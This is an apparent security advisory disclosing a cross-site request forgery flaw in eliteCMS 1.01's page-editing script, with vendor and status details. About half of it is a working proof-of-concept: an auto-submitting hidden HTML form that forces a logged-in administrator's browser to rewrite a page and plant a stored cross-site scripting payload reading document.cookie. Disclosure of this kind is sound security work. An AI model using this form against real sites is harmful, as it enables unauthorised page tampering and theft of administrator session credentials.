eliteCMS 1.01 Cross Site Request Forgery

`Vulnerability ID: HTB22355  
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_elitecms.html  
Product: eliteCMS  
Vendor: Elite Graphix  
Vulnerable Version: 1.01 and Probably Prior Versions  
Vendor Notification: 19 April 2010   
Vulnerability Type: CSRF (Cross-Site Request Forgery)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Low   
Credit: High-Tech Bridge SA (http://www.htbridge.ch/)   
  
Vulnerability Details:  
The vulnerability exists due to failure in the "/admin/edit_page.php" script to properly verify the source of HTTP request.   
  
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.   
  
Attacker can use browser to exploit this vulnerability. The following PoC is available:  
  
  
  
<form action='http://www.example.com/admin/edit_page.php?page=1' name="frm" method='post' >  
<input name="title" type="hidden" value="Home"/>  
<input name="keywords" type="hidden" value="eliteCMS, Elite CMS" />  
<input name="description" type="hidden" value='"><script>alert(document.cookie)</script>' />  
<input name="menu_name" type="hidden" value="Home"/>  
<input name="position" type="hidden" value="1"/>  
<input name="active" type="hidden" value="1" />  
<input name="home_page" type="hidden" value="1" />  
<input name="sidebar" type="hidden" value="1" />  
<input name="sidebar_align" type="hidden" value="left" />  
<input name="contact_form" type="hidden" value="0" />  
<input type="submit" name="submit" value="Update Page" />  
</form>  
<script>  
document.frm.submit();  
</script>  
  
  
  
`